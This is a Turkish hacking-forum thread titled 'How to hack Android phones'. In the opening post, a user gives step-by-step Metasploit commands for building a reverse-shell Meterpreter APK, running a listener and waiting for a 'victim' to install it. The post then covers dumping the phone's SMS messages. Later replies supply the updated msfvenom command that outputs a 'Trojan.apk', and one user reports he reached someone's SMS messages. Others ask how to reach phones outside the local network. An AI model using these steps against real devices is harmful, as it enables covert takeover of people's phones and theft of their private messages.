1.                                                

Andorid Telefonlara Nasil Sızılır

'Metasploit' forumunda KaliBot tarafından 15 Nisan 2016 tarihinde açılan konu

  1. KaliBot

    KaliBot Albay

    Katılım:
    30 Haziran 2015
    Mesaj:
    534
    Beğeniler:
    41
    Ödül Puanları:
    12
    Web Sitesi:

    Selamün aleyküm / Aleyküm Selam
    Hayırlı Cumalar..

    Kısaca android telefonlara nasil sızılır anlatmak istedim .

    Adım 1 : İlk olarak terminalimizi açıyoruz ve aşağıdaki komutları yazıyoruz .

    Komut ; msfpayload android/meterpreter/reverse_tcp LHOST= ip adresiniz (ifconfig komutu ile öğrenebilirsiniz LPORT= hangi port üzerinden yapmak istiyorsanız R > /root/Desktop/isim.apk . ( nereye kaydetmek istiyorsanız path bölümünde orayı belirtiyorsunuz. ) ve dosya oluşturuldu bakalım masa üstümüze.

    [​IMG]

    Adım 2 : ” msfconsole ” komutu ile exploit aracımız çalıştırıyoruz ve aşağıdaki komutu yazıyoruz .

    Komut ; use multi/handler .

    [​IMG]

    Adım 3 : Burada ise aşağıdaki kodları yazıyoruz .

    Komut ;
    > set payload android/meterpreter/reverse_tcp
    > show options
    > set LHOST 192.168.1.1 ( ip adresinizi yazıyorsunuz linux makinanızın)
    > set LPORT 4444 ( belirlediğiniz port adresini yazıyorsunuz )
    > exploit ( kurbanın yazılımı çalıştırması ile root satırına geçmeyi bekliyoruz.)

    [​IMG]

    Adım 4 : Ve kurban yazılımı çalıştırarak bize yetki göndermiş durumda

    [​IMG]

    Adım 5 : Burada ise telefon içerisinde yapılabilecek bütün işlemerin komutlarını görüntülemek için ” help ” komutunu kullanıyoruz . Sağ tarafta hangi komutun ne işe yaradıgını bize açıklamakta.

    [​IMG]

    Adım 6 : Örnek olarak telefondaki SMS’lere bakalım . Bunun için ” dump_sms ” komutunu kullanıyoruz.

    [​IMG]

    Adım 7 : Dosyamızı ” root ” klasör’üne kaydetiyor. Şimdi ismine göre hangi dosyaysa açalım.

    [​IMG]

    Adım 8 : Ve SMS’leri görüntüledik . Kim göndermiş , kurban kime göndermiş , numara , tarih , açıklama , mesaj vb ayrıntıları görüntüledik .

    [​IMG]
     
  2. Al-Farabi

    Al-Farabi Albay

    Katılım:
    16 Ocak 2016
    Mesaj:
    1,345
    Beğeniler:
    126
    Ödül Puanları:
    63
    Elinize Sağlık Çok Başarılı Olmuş
     
  3. Al-Farabi

    Al-Farabi Albay

    Katılım:
    16 Ocak 2016
    Mesaj:
    1,345
    Beğeniler:
    126
    Ödül Puanları:
    63
    Hocam Rahatsız Ediyorum Ama;
    Kod:
    bash: msfpayload: command not found
    
    
    Hatası Almaktayım Güncelleme Nedeniyle Mi Oldu Acaba?
    Ayrıca Sanal Olarak Kurdum Bu Sorun Olur Mu?
     
  4. MSalih

    MSalih New Member

    Katılım:
    10 Ocak 2016
    Mesaj:
    80
    Beğeniler:
    0
    Ödül Puanları:
    0
    Şehir:
    Belirtilmemiş
    msfpayload değilde msfconsole ile metasploite bağlanıp oradan payload u yapmayı denerseniz daha iyi olur yanlış bilmiyorsam msfpayload diye bir komut yok
     
  5. ProHacker

    ProHacker Albay

    Katılım:
    20 Mart 2016
    Mesaj:
    434
    Beğeniler:
    1
    Ödül Puanları:
    18
    Şehir:
    Belirtilmemiş
    @KaliBot Teşekkürler, gayet faydalı :)
     
  6. Hattab

    Hattab New Member

    Katılım:
    22 Ekim 2015
    Mesaj:
    550
    Beğeniler:
    4
    Ödül Puanları:
    0
    Eline Sağlık
     
  7. ziliyot

    ziliyot New Member

    Katılım:
    9 Mayıs 2016
    Mesaj:
    35
    Beğeniler:
    0
    Ödül Puanları:
    0
    local ağ dimi dısardan telefon baglansa yapabilirmi aynı işlemler
     
  8. onur0616

    onur0616 New Member

    Katılım:
    27 Şubat 2016
    Mesaj:
    8
    Beğeniler:
    0
    Ödül Puanları:
    0
    Bende senin mesajını geç gördüm güncellemede gitti bu "msfpayload" komutu onun yerine "msfvenom" geldi ama sen "msfpayload" yerine şöyle yaz "msfvenom -p" yada "msfvenom --payload" sadece msfvenom yazarsan biraz bekledikten sonra işlemler ve kısaltılmış komutların helpini göreceksin.
     
  9. MrX

    MrX Active Member

    Katılım:
    22 Mart 2016
    Mesaj:
    824
    Beğeniler:
    27
    Ödül Puanları:
    28
    Şehir:
    Belirtilmemiş
    yok onun sanal pc ile alakası yok kardeş bak şöyle yapıcaksın orda arkadaş eksik göstermir yani o kali 1.10 kullanıyor %90 o yüzden msfpayload (burayada paylloadı yazmış)
    sende hata verdiğine göre kali linux 2.0 veya üstünü kullanıyorsun bunun çözümüde şöylerdir msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 R> /root/Desktop/Trojan.apk bu şekilde yaparsan hata almazsın
     
  10. korkutali

    korkutali New Member

    Katılım:
    16 Ocak 2016
    Mesaj:
    49
    Beğeniler:
    0
    Ödül Puanları:
    0
    msfpayload yerine mrX'in dediği gibi msfvenom -p yazıldığında sorun kalmıyor.

    Konu anlatımı için teşekkür ederim, denedim az evvel SMS bilgilerine ulaştım. Webcam'e ulaşamıyorum ama bu neden olabilir?
     
  11. onur0616

    onur0616 New Member

    Katılım:
    27 Şubat 2016
    Mesaj:
    8
    Beğeniler:
    0
    Ödül Puanları:
    0
    Sanki ben farklı birşey söylemişim gibi mi ne? :(
     
  12. korkutali

    korkutali New Member

    Katılım:
    16 Ocak 2016
    Mesaj:
    49
    Beğeniler:
    0
    Ödül Puanları:
    0
    Estağfirullah onur0616, gözümden kaçmış tamamen :)
     
  13. skylorde21

    skylorde21 New Member

    Katılım:
    1 Haziran 2016
    Mesaj:
    4
    Beğeniler:
    0
    Ödül Puanları:
    0
    eline sağlık gayet sade doğru anlatmışsın
     
  14. ghostuser

    ghostuser New Member

    Katılım:
    16 Şubat 2016
    Mesaj:
    42
    Beğeniler:
    0
    Ödül Puanları:
    0
    bunu local ağ dışında yapmanın bir imkanı yok mu
     
  15. MacTavish

    MacTavish Moderator

    Katılım:
    14 Temmuz 2015
    Mesaj:
    901
    Beğeniler:
    20
    Ödül Puanları:
    18
    Cinsiyet:
    Erkek
    Meslek:
    Öğrenci
    Şehir:
    Van
    Web Sitesi:
    Port Açarsan Yapabilirsin
     
  16. BadBoy10

    BadBoy10 New Member

    Katılım:
    21 Mayıs 2016
    Mesaj:
    25
    Beğeniler:
    0
    Ödül Puanları:
    0
    Eline sağlık harika bi anlatım
     
  17. korkutali

    korkutali New Member

    Katılım:
    16 Ocak 2016
    Mesaj:
    49
    Beğeniler:
    0
    Ödül Puanları:
    0
    MacTavish, Vaktin varsa anlatabilir misin?
     
  18. BadBoy10

    BadBoy10 New Member

    Katılım:
    21 Mayıs 2016
    Mesaj:
    25
    Beğeniler:
    0
    Ödül Puanları:
    0
    Facebook adresi Ver Yapalım Beraber gösterirm istersen
     
  19. korkutali

    korkutali New Member

    Katılım:
    16 Ocak 2016
    Mesaj:
    49
    Beğeniler:
    0
    Ödül Puanları:
    0
    Ilginiz icin tesekkur ederim ancak herhangi bir sosyal hesabim yok.
     
  20. BadBoy10

    BadBoy10 New Member

    Katılım:
    21 Mayıs 2016
    Mesaj:
    25
    Beğeniler:
    0
    Ödül Puanları:
    0
    Numara Vs Nurdan devamlı açık olmadığım için anlık olarak yardım edemem
     

Bu Sayfayı Paylaş

Share